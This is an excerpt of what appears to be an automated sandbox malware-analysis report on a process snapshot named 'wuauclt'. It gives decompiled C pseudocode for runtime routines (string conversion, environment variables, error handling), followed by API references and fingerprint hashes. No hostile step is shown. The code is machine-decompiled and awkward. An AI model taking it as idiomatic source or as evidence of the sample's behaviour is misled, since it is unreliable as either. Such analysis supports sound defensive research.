                                                														_t108 = _t121 + 8;
                                                														asm("sbb eax, eax");
                                                														if((_t121 + 0x00000008 & _t77) == 0) {
                                                															_t127 = _t126;
                                                															goto L56;
                                                														} else {
                                                															asm("sbb eax, eax");
                                                															_t81 = _t77 & _t121 + 0x00000008;
                                                															_t108 = _t121 + 8;
                                                															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                																asm("sbb eax, eax");
                                                																_t127 = E0025D32E(_t108, _t81 & _t108);
                                                																_pop(_t108);
                                                																if(_t127 == 0) {
                                                																	goto L59;
                                                																} else {
                                                																	 *_t127 = 0xdddd;
                                                																	goto L54;
                                                																}
                                                															} else {
                                                																asm("sbb eax, eax");
                                                																E002676E0();
                                                																_t127 = _t129;
                                                																if(_t127 == 0) {
                                                																	L59:
                                                																	_t100 = _v32;
                                                																} else {
                                                																	 *_t127 = 0xcccc;
                                                																	L54:
                                                																	_t127 =  &(_t127[4]);
                                                																	L56:
                                                																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
                                                																		goto L59;
                                                																	} else {
                                                																		_t100 = _v32;
                                                																		_t126 = E0025D5D9(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														E00260E53(_t127);
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								E00260E53(_t100);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L63:
                                                				return E00257097(_v8 ^ _t128, _t127);
                                                			}




































                                                0x00000000
                                                0x002655ea
                                                0x002655ea
                                                0x002655ed
                                                0x002655f2
                                                0x002655f6
                                                0x00265642
                                                0x00000000
                                                0x002655f8
                                                0x002655fd
                                                0x002655ff
                                                0x00265601
                                                0x00265609
                                                0x00265626
                                                0x00265630
                                                0x00265632
                                                0x00265635
                                                0x00000000
                                                0x00265637
                                                0x00265637
                                                0x00000000
                                                0x00265637
                                                0x0026560b
                                                0x0026560d
                                                0x00265611
                                                0x00265616
                                                0x0026561a
                                                0x0026567c
                                                0x0026567c
                                                0x0026561c
                                                0x0026561c
                                                0x0026563d
                                                0x0026563d
                                                0x00265644
                                                0x00265646
                                                0x00000000
                                                0x0026565f
                                                0x0026565f
                                                0x00265678
                                                0x00265678
                                                0x00265646
                                                0x0026561a
                                                0x00265609
                                                0x00265680
                                                0x00265685
                                                0x002655e4
                                                0x002655ca
                                                0x002655ae
                                                0x00265573
                                                0x0026555f
                                                0x0026568c
                                                0x00265692
                                                0x0026553a
                                                0x0026547b
                                                0x00265447
                                                0x00265694
                                                0x002656a7

                                                APIs
                                                • GetCPInfo.KERNEL32(014BE790,014BE790,?,7FFFFFFF,?,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?,014BE790), ref: 002654AC
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000009,014BE790,014BE790,00000000,00000000,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 0026552F
                                                • __alloca_probe_16.LIBCMT ref: 00265567
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000001,014BE790,014BE790,00000000,002656D9,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 002655C2
                                                • __alloca_probe_16.LIBCMT ref: 00265611
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000009,014BE790,014BE790,00000000,00000000,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 002655D9
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000001,014BE790,014BE790,00000000,014BE790,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 00265655
                                                • __freea.LIBCMT ref: 00265680
                                                • __freea.LIBCMT ref: 0026568C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                • String ID:
                                                • API String ID: 3256262068-0
                                                • Opcode ID: 7a9502223ee78fa85b79f1ad18a6d767c3e51ca5d3b07209e652d8aadfab60e4
                                                • Instruction ID: e6c736010f5b4d3a7d77a17f2892598e4d567ae1591d6f91fe0dc8d88cb33755
                                                • Opcode Fuzzy Hash: 7a9502223ee78fa85b79f1ad18a6d767c3e51ca5d3b07209e652d8aadfab60e4
                                                • Instruction Fuzzy Hash: CE91B371E20A279EDF208E64CC85AEE7BA9AF09351F584599E805E7140DB75DCE0CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E002604DC(signed int _a4, signed int _a8) {
                                                				intOrPtr _v0;
                                                				intOrPtr _v4;
                                                				signed char _v5;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v44;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				signed int _t62;
                                                				signed int _t64;
                                                				signed int _t65;
                                                				signed int _t68;
                                                				signed int _t69;
                                                				signed int _t73;
                                                				signed int* _t75;
                                                				signed int _t82;
                                                				signed int _t84;
                                                				signed int _t86;
                                                				signed int _t87;
                                                				signed int _t91;
                                                				signed int _t98;
                                                				intOrPtr* _t99;
                                                				signed int _t108;
                                                				signed int _t109;
                                                				signed int _t111;
                                                				signed int _t112;
                                                				intOrPtr _t115;
                                                				void* _t119;
                                                				signed int _t121;
                                                				void* _t124;
                                                				signed int _t125;
                                                				signed int _t126;
                                                				void* _t131;
                                                				intOrPtr* _t135;
                                                				signed int _t138;
                                                				signed int _t140;
                                                				void* _t141;
                                                				void* _t142;
                                                				signed int _t143;
                                                				signed int _t145;
                                                				signed int* _t146;
                                                				signed int _t151;
                                                				signed int _t152;
                                                				CHAR* _t153;
                                                				signed int _t154;
                                                				signed int* _t155;
                                                				signed int _t156;
                                                				signed int _t158;
                                                				void* _t163;
                                                				void* _t165;
                                                				void* _t166;
                                                
                                                				_t111 = _a4;
                                                				if(_t111 != 0) {
                                                					_t143 = _t111;
                                                					_t58 = E00267EE0(_t111, 0x3d);
                                                					_v16 = _t58;
                                                					_t119 = _t142;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						L10:
                                                						 *((intOrPtr*)(E0025D495())) = 0x16;
                                                						goto L11;
                                                					} else {
                                                						__eflags = _t58 - _t111;
                                                						if(_t58 == _t111) {
                                                							goto L10;
                                                						} else {
                                                							__eflags =  *((char*)(_t58 + 1));
                                                							_t151 =  *0x273a60; // 0x14be790
                                                							_t62 = _t58 & 0xffffff00 |  *((char*)(_t58 + 1)) == 0x00000000;
                                                							_v5 = _t62;
                                                							__eflags = _t151 -  *0x273a6c; // 0x14be790
                                                							if(__eflags == 0) {
                                                								L44();
                                                								_t151 = _t62;
                                                								_t62 = _v5;
                                                								_t119 = _t151;
                                                								 *0x273a60 = _t151;
                                                							}
                                                							_t112 = 0;
                                                							__eflags = _t151;
                                                							if(_t151 != 0) {
                                                								L21:
                                                								_t121 = _t143;
                                                								_t64 = _v16 - _t121;
                                                								_push(_t64);
                                                								_push(_t121);
                                                								L61();
                                                								_v12 = _t64;
                                                								__eflags = _t64;
                                                								if(_t64 < 0) {
                                                									L29:
                                                									__eflags = _v5 - _t112;
                                                									if(_v5 != _t112) {
                                                										goto L12;
                                                									} else {
                                                										_t65 =  ~_t64;
                                                										_v12 = _t65;
                                                										_t27 = _t65 + 2; // 0x2
                                                										_t124 = _t27;
                                                										__eflags = _t124 - _t65;
                                                										if(_t124 < _t65) {
                                                											goto L11;
                                                										} else {
                                                											__eflags = _t124 - 0x3fffffff;
                                                											if(_t124 >= 0x3fffffff) {
                                                												goto L11;
                                                											} else {
                                                												_push(4);
                                                												_push(_t124);
                                                												_t152 = E00261204(_t151);
                                                												E0025D2F4(_t112);
                                                												_t165 = _t165 + 0x10;
                                                												__eflags = _t152;
                                                												if(_t152 == 0) {
                                                													goto L11;
                                                												} else {
                                                													_t125 = _v12;
                                                													_t143 = _t112;
                                                													_t68 = _a4;
                                                													 *(_t152 + _t125 * 4) = _t68;
                                                													 *(_t152 + 4 + _t125 * 4) = _t112;
                                                													goto L34;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									__eflags =  *_t151 - _t112;
                                                									if( *_t151 == _t112) {
                                                										goto L29;
                                                									} else {
                                                										E0025D2F4( *((intOrPtr*)(_t151 + _t64 * 4)));
                                                										_t140 = _v12;
                                                										__eflags = _v5 - _t112;
                                                										if(_v5 != _t112) {
                                                											while(1) {
                                                												__eflags =  *(_t151 + _t140 * 4) - _t112;
                                                												if( *(_t151 + _t140 * 4) == _t112) {
                                                													break;
                                                												}
                                                												 *(_t151 + _t140 * 4) =  *(_t151 + 4 + _t140 * 4);
                                                												_t140 = _t140 + 1;
                                                												__eflags = _t140;
                                                											}
                                                											_push(4);
                                                											_push(_t140);
                                                											_t152 = E00261204(_t151);
                                                											E0025D2F4(_t112);
                                                											_t165 = _t165 + 0x10;
                                                											_t68 = _t143;
                                                											__eflags = _t152;
                                                											if(_t152 != 0) {
                                                												L34:
                                                												 *0x273a60 = _t152;
                                                											}
                                                										} else {
                                                											_t68 = _a4;
                                                											_t143 = _t112;
                                                											 *(_t151 + _t140 * 4) = _t68;
                                                										}
                                                										__eflags = _a8 - _t112;
                                                										if(_a8 == _t112) {
                                                											goto L12;
                                                										} else {
                                                											_t126 = _t68;
                                                											_t141 = _t126 + 1;
                                                											do {
                                                												_t69 =  *_t126;
                                                												_t126 = _t126 + 1;
                                                												__eflags = _t69;
                                                											} while (_t69 != 0);
                                                											_v12 = _t126 - _t141 + 2;
                                                											_t153 = E0025D3BF(_t126 - _t141, _t126 - _t141 + 2, 1);
                                                											_pop(_t129);
                                                											__eflags = _t153;
                                                											if(_t153 == 0) {
                                                												L42:
                                                												E0025D2F4(_t153);
                                                												goto L12;
                                                											} else {
                                                												_t73 = E0025BAB2(_t153, _v12, _a4);
                                                												_t166 = _t165 + 0xc;
                                                												__eflags = _t73;
                                                												if(_t73 != 0) {
                                                													_push(_t112);
                                                													_push(_t112);
                                                													_push(_t112);
                                                													_push(_t112);
                                                													_push(_t112);
                                                													E0025BA7F();
                                                													asm("int3");
                                                													_t163 = _t166;
                                                													_push(_t143);
                                                													_t145 = _v44;
                                                													__eflags = _t145;
                                                													if(_t145 != 0) {
                                                														_t131 = 0;
                                                														_t75 = _t145;
                                                														__eflags =  *_t145;
                                                														if( *_t145 != 0) {
                                                															do {
                                                																_t75 =  &(_t75[1]);
                                                																_t131 = _t131 + 1;
                                                																__eflags =  *_t75;
                                                															} while ( *_t75 != 0);
                                                														}
                                                														_t47 = _t131 + 1; // 0x2
                                                														_t154 = E0025D3BF(_t131, _t47, 4);
                                                														_t133 = _t153;
                                                														__eflags = _t154;
                                                														if(_t154 == 0) {
                                                															L59:
                                                															E0025D37C(_t112, _t133, _t141, _t145, _t154);
                                                															goto L60;
                                                														} else {
                                                															__eflags =  *_t145;
                                                															if( *_t145 == 0) {
                                                																L57:
                                                																E0025D2F4(0);
                                                																_t86 = _t154;
                                                																goto L58;
                                                															} else {
                                                																_push(_t112);
                                                																_t112 = _t154 - _t145;
                                                																__eflags = _t112;
                                                																do {
                                                																	_t135 =  *_t145;
                                                																	_t48 = _t135 + 1; // 0x5
                                                																	_t141 = _t48;
                                                																	do {
                                                																		_t87 =  *_t135;
                                                																		_t135 = _t135 + 1;
                                                																		__eflags = _t87;
                                                																	} while (_t87 != 0);
                                                																	_t49 = _t135 - _t141 + 1; // 0x6
                                                																	_v12 = _t49;
                                                																	 *(_t112 + _t145) = E0025D3BF(_t135 - _t141, _t49, 1);
                                                																	E0025D2F4(0);
                                                																	_t166 = _t166 + 0xc;
                                                																	__eflags =  *(_t112 + _t145);
                                                																	if( *(_t112 + _t145) == 0) {
                                                																		goto L59;
                                                																	} else {
                                                																		_t91 = E0025BAB2( *(_t112 + _t145), _v12,  *_t145);
                                                																		_t166 = _t166 + 0xc;
                                                																		__eflags = _t91;
                                                																		if(_t91 != 0) {
                                                																			L60:
                                                																			_push(0);
                                                																			_push(0);
                                                																			_push(0);
                                                																			_push(0);
                                                																			_push(0);
                                                																			E0025BA7F();
                                                																			asm("int3");
                                                																			_push(_t163);
                                                																			_push(_t112);
                                                																			_push(_t154);
                                                																			_push(_t145);
                                                																			_t146 =  *0x273a60; // 0x14be790
                                                																			_t155 = _t146;
                                                																			__eflags =  *_t146;
                                                																			if( *_t146 == 0) {
                                                																				L67:
                                                																				_t156 = _t155 - _t146;
                                                																				__eflags = _t156;
                                                																				_t158 =  ~(_t156 >> 2);
                                                																			} else {
                                                																				_t115 = _v0;
                                                																				do {
                                                																					_t82 = E00264A03(_v4,  *_t155, _t115);
                                                																					_t166 = _t166 + 0xc;
                                                																					__eflags = _t82;
                                                																					if(_t82 != 0) {
                                                																						goto L66;
                                                																					} else {
                                                																						_t84 =  *((intOrPtr*)(_t115 +  *_t155));
                                                																						__eflags = _t84 - 0x3d;
                                                																						if(_t84 == 0x3d) {
                                                																							L69:
                                                																							_t158 = _t155 - _t146 >> 2;
                                                																						} else {
                                                																							__eflags = _t84;
                                                																							if(_t84 == 0) {
                                                																								goto L69;
                                                																							} else {
                                                																								goto L66;
                                                																							}
                                                																						}
                                                																					}
                                                																					goto L68;
                                                																					L66:
                                                																					_t155 =  &(_t155[1]);
                                                																					__eflags =  *_t155;
                                                																				} while ( *_t155 != 0);
                                                																				goto L67;
                                                																			}
                                                																			L68:
                                                																			return _t158;
                                                																		} else {
                                                																			goto L55;
                                                																		}
                                                																	}
                                                																	goto L70;
                                                																	L55:
                                                																	_t145 = _t145 + 4;
                                                																	__eflags =  *_t145 - _t91;
                                                																} while ( *_t145 != _t91);
                                                																goto L57;
                                                															}
                                                														}
                                                													} else {
                                                														_t86 = 0;
                                                														L58:
                                                														return _t86;
                                                													}
                                                												} else {
                                                													_t138 = _v16 + 1 + _t153 - _a4;
                                                													asm("sbb eax, eax");
                                                													 *(_t138 - 1) = _t112;
                                                													_t98 = SetEnvironmentVariableA(_t153,  !( ~(_v5 & 0x000000ff)) & _t138);
                                                													__eflags = _t98;
                                                													if(_t98 == 0) {
                                                														_t99 = E0025D495();
                                                														_t112 = _t112 | 0xffffffff;
                                                														__eflags = _t112;
                                                														 *_t99 = 0x2a;
                                                													}
                                                													goto L42;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								__eflags = _a8;
                                                								if(_a8 == 0) {
                                                									L14:
                                                									__eflags = _t62;
                                                									if(_t62 == 0) {
                                                										 *0x273a60 = E0025D3BF(_t119, 1, 4);
                                                										E0025D2F4(_t112);
                                                										_t151 =  *0x273a60; // 0x14be790
                                                										_t165 = _t165 + 0xc;
                                                										__eflags = _t151;
                                                										if(_t151 == 0) {
                                                											goto L11;
                                                										} else {
                                                											__eflags =  *0x273a64 - _t112; // 0x0
                                                											if(__eflags != 0) {
                                                												goto L20;
                                                											} else {
                                                												 *0x273a64 = E0025D3BF(_t119, 1, 4);
                                                												E0025D2F4(_t112);
                                                												_t165 = _t165 + 0xc;
                                                												__eflags =  *0x273a64 - _t112; // 0x0
                                                												if(__eflags == 0) {
                                                													goto L11;
                                                												} else {
                                                													goto L19;
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_t112 = 0;
                                                										goto L12;
                                                									}
                                                								} else {
                                                									__eflags =  *0x273a64 - _t112; // 0x0
                                                									if(__eflags == 0) {
                                                										goto L14;
                                                									} else {
                                                										_t108 = L0025C6EC(0);
                                                										__eflags = _t108;
                                                										if(_t108 != 0) {
                                                											L19:
                                                											_t151 =  *0x273a60; // 0x14be790
                                                											L20:
                                                											__eflags = _t151;
                                                											if(_t151 == 0) {
                                                												L11:
                                                												_t112 = _t111 | 0xffffffff;
                                                												__eflags = _t112;
                                                												L12:
                                                												E0025D2F4(_t143);
                                                												_t61 = _t112;
                                                												goto L13;
                                                											} else {
                                                												goto L21;
                                                											}
                                                										} else {
                                                											goto L10;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t109 = E0025D495();
                                                					 *_t109 = 0x16;
                                                					_t61 = _t109 | 0xffffffff;
                                                					L13:
                                                					return _t61;
                                                				}
                                                				L70:
                                                			}



























































                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 1282221369-0
                                                • Opcode ID: 70f1f7cf3f44d15afff04cdb9a809f6be8f59f3aee00a58781483b042a9de6d5
                                                • Instruction ID: c8755a46e7c419683657049344e3dcbcb6106e4a68b3316b638c247d03292cae
                                                • Opcode Fuzzy Hash: 70f1f7cf3f44d15afff04cdb9a809f6be8f59f3aee00a58781483b042a9de6d5
                                                • Instruction Fuzzy Hash: 00616B71924312AFDB21EF6898C276F77A4BF00310F54056DED4697281EB319AE0DF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E0025E966(void* __ebx, void* __ecx, void* __edx) {
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t20;
                                                				void* _t21;
                                                				void* _t23;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				long _t36;
                                                				long _t37;
                                                				void* _t40;
                                                
                                                				_t29 = __edx;
                                                				_t23 = __ecx;
                                                				_t20 = __ebx;
                                                				_t36 = GetLastError();
                                                				_t2 =  *0x272524; // 0x6
                                                				_t42 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t3 = E0025D3BF(_t23, 1, 0x364);
                                                					_t31 = _t3;
                                                					_pop(_t25);
                                                					if(_t31 != 0) {
                                                						_t4 = E0025D74F(_t25, __eflags,  *0x272524, _t31);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E0025E7D8(_t25, _t31, "(%'");
                                                							E0025D2F4(0);
                                                							_t40 = _t40 + 0xc;
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t31);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t3);
                                                						L4:
                                                						E0025D2F4();
                                                						_pop(_t25);
                                                						L9:
                                                						SetLastError(_t36);
                                                						E0025D37C(_t20, _t25, _t29, _t31, _t36);
                                                						asm("int3");
                                                						_push(_t20);
                                                						_push(_t36);
                                                						_push(_t31);
                                                						_t37 = GetLastError();
                                                						_t21 = 0;
                                                						_t9 =  *0x272524; // 0x6
                                                						_t45 = _t9 - 0xffffffff;
                                                						if(_t9 == 0xffffffff) {
                                                							L12:
                                                							_t32 = E0025D3BF(_t25, 1, 0x364);
                                                							_pop(_t27);
                                                							if(_t32 != 0) {
                                                								_t11 = E0025D74F(_t27, __eflags,  *0x272524, _t32);
                                                								__eflags = _t11;
                                                								if(_t11 != 0) {
                                                									E0025E7D8(_t27, _t32, "(%'");
                                                									E0025D2F4(_t21);
                                                									__eflags = _t32;
                                                									if(_t32 != 0) {
                                                										goto L19;
                                                									} else {
                                                										goto L18;
                                                									}
                                                								} else {
                                                									_push(_t32);
                                                									goto L14;
                                                								}
                                                							} else {
                                                								_push(_t21);
                                                								L14:
                                                								E0025D2F4();
                                                								L18:
                                                								SetLastError(_t37);
                                                							}
                                                						} else {
                                                							_t32 = E0025D6F9(_t25, _t45, _t9);
                                                							if(_t32 != 0) {
                                                								L19:
                                                								SetLastError(_t37);
                                                								_t21 = _t32;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						}
                                                						return _t21;
                                                					}
                                                				} else {
                                                					_t31 = E0025D6F9(_t23, _t42, _t2);
                                                					if(_t31 != 0) {
                                                						L8:
                                                						SetLastError(_t36);
                                                						return _t31;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID: (%'
                                                • API String ID: 3160817290-2229709766
                                                • Opcode ID: 3acf0f419d710b28f177e8d6735b90f222e1f4f729ab77d287fa989ae5c26a24
                                                • Instruction ID: 28f5f36057f9ae4f4b9ff9823e2c4cb1974ff833b2c6b3d98cb8f9489f142ea1
                                                • Opcode Fuzzy Hash: 3acf0f419d710b28f177e8d6735b90f222e1f4f729ab77d287fa989ae5c26a24
                                                • Instruction Fuzzy Hash: AAF049721646116ADA6A37347D0AF5E226E4BD1323F220020FC18D2191EF70896E895D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E002627D8(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				int _v12;
                                                				void* _v24;
                                                				void* __esi;
                                                				signed int _t49;
                                                				signed int _t54;
                                                				int _t58;
                                                				signed int _t60;
                                                				short* _t62;
                                                				signed int _t66;
                                                				short* _t70;
                                                				int _t71;
                                                				int _t78;
                                                				short* _t81;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t95;
                                                				void* _t96;
                                                				int _t98;
                                                				short* _t101;
                                                				int _t103;
                                                				void* _t104;
                                                				signed int _t106;
                                                				short* _t107;
                                                				void* _t110;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t49 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t49 ^ _t106;
                                                				_t103 = _a20;
                                                				if(_t103 > 0) {
                                                					_t78 = E00264F92(_a16, _t103);
                                                					_t110 = _t78 - _t103;
                                                					_t4 = _t78 + 1; // 0x1
                                                					_t103 = _t4;
                                                					if(_t110 >= 0) {
                                                						_t103 = _t78;
                                                					}
                                                				}
                                                				_t98 = _a32;
                                                				if(_t98 == 0) {
                                                					_t98 =  *( *_a4 + 8);
                                                					_a32 = _t98;
                                                				}
                                                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                				_v12 = _t54;
                                                				if(_t54 == 0) {
                                                					L38:
                                                					_pop(_t104);
                                                					return E00257097(_v8 ^ _t106, _t104);
                                                				} else {
                                                					_t95 = _t54 + _t54;
                                                					_t85 = _t95 + 8;
                                                					asm("sbb eax, eax");
                                                					if((_t95 + 0x00000008 & _t54) == 0) {
                                                						_t81 = 0;
                                                						__eflags = 0;
                                                						L14:
                                                						if(_t81 == 0) {
                                                							L36:
                                                							_t105 = 0;
                                                							L37:
                                                							E00260E53(_t81);
                                                							goto L38;
                                                						}
                                                						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                						_t121 = _t58;
                                                						if(_t58 == 0) {
                                                							goto L36;
                                                						}
                                                						_t100 = _v12;
                                                						_t60 = E0025D80A(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                						_t105 = _t60;
                                                						if(_t105 == 0) {
                                                							goto L36;
                                                						}
                                                						if((_a12 & 0x00000400) == 0) {
                                                							_t96 = _t105 + _t105;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							__eflags = _t87 & _t60;
                                                							if((_t87 & _t60) == 0) {
                                                								_t101 = 0;
                                                								__eflags = 0;
                                                								L30:
                                                								__eflags = _t101;
                                                								if(__eflags == 0) {
                                                									L35:
                                                									E00260E53(_t101);
                                                									goto L36;
                                                								}
                                                								_t62 = E0025D80A(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                								__eflags = _t62;
                                                								if(_t62 == 0) {
                                                									goto L35;
                                                								}
                                                								_push(0);
                                                								_push(0);
                                                								__eflags = _a28;
                                                								if(_a28 != 0) {
                                                									_push(_a28);
                                                									_push(_a24);
                                                								} else {
                                                									_push(0);
                                                									_push(0);
                                                								}
                                                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                								__eflags = _t105;
                                                								if(_t105 != 0) {
                                                									E00260E53(_t101);
                                                									goto L37;
                                                								} else {
                                                									goto L35;
                                                								}
                                                							}
                                                							_t90 = _t96 + 8;
                                                							__eflags = _t96 - _t90;
                                                							asm("sbb eax, eax");
                                                							_t66 = _t60 & _t90;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t66 - 0x400;
                                                							if(_t66 > 0x400) {
                                                								__eflags = _t96 - _t87;
                                                								asm("sbb eax, eax");
                                                								_t101 = E0025D32E(_t87, _t66 & _t87);
                                                								_pop(_t87);
                                                								__eflags = _t101;
                                                								if(_t101 == 0) {
                                                									goto L35;
                                                								}
                                                								 *_t101 = 0xdddd;
                                                								L28:
                                                								_t101 =  &(_t101[4]);
                                                								goto L30;
                                                							}
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							E002676E0();
                                                							_t101 = _t107;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								goto L35;
                                                							}
                                                							 *_t101 = 0xcccc;
                                                							goto L28;
                                                						}
                                                						_t70 = _a28;
                                                						if(_t70 == 0) {
                                                							goto L37;
                                                						}
                                                						_t125 = _t105 - _t70;
                                                						if(_t105 > _t70) {
                                                							goto L36;
                                                						}
                                                						_t71 = E0025D80A(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                						_t105 = _t71;
                                                						if(_t71 != 0) {
                                                							goto L37;
                                                						}
                                                						goto L36;
                                                					}
                                                					asm("sbb eax, eax");
                                                					_t72 = _t54 & _t95 + 0x00000008;
                                                					_t85 = _t95 + 8;
                                                					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                						__eflags = _t95 - _t85;
                                                						asm("sbb eax, eax");
                                                						_t81 = E0025D32E(_t85, _t72 & _t85);
                                                						_pop(_t85);
                                                						__eflags = _t81;
                                                						if(__eflags == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t81 = 0xdddd;
                                                						L12:
                                                						_t81 =  &(_t81[4]);
                                                						goto L14;
                                                					}
                                                					asm("sbb eax, eax");
                                                					E002676E0();
                                                					_t81 = _t107;
                                                					if(_t81 == 0) {
                                                						goto L36;
                                                					}
                                                					 *_t81 = 0xcccc;
                                                					goto L12;
                                                				}
                                                			}

                                                0x00262942
                                                0x00262947
                                                0x00262962
                                                0x00262964
                                                0x0026296e
                                                0x00262970
                                                0x00262971
                                                0x00262973
                                                0x00000000
                                                0x00000000
                                                0x00262975
                                                0x0026297b
                                                0x0026297b
                                                0x00000000
                                                0x0026297b
                                                0x00262949
                                                0x0026294b
                                                0x0026294f
                                                0x00262954
                                                0x00262956
                                                0x00262958
                                                0x00000000
                                                0x00000000
                                                0x0026295a
                                                0x00000000
                                                0x0026295a
                                                0x002628f0
                                                0x002628f5
                                                0x00000000
                                                0x00000000
                                                0x002628fb
                                                0x002628fd
                                                0x00000000
                                                0x00000000
                                                0x00262914
                                                0x00262919
                                                0x0026291d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00262923
                                                0x00262856
                                                0x00262858
                                                0x0026285a
                                                0x00262862
                                                0x00262881
                                                0x00262883
                                                0x0026288d
                                                0x0026288f
                                                0x00262890
                                                0x00262892
                                                0x00000000
                                                0x00000000
                                                0x00262898
                                                0x0026289e
                                                0x0026289e
                                                0x00000000
                                                0x0026289e
                                                0x00262866
                                                0x0026286a
                                                0x0026286f
                                                0x00262873
                                                0x00000000
                                                0x00000000
                                                0x00262879
                                                0x00000000
                                                0x00262879

                                                APIs
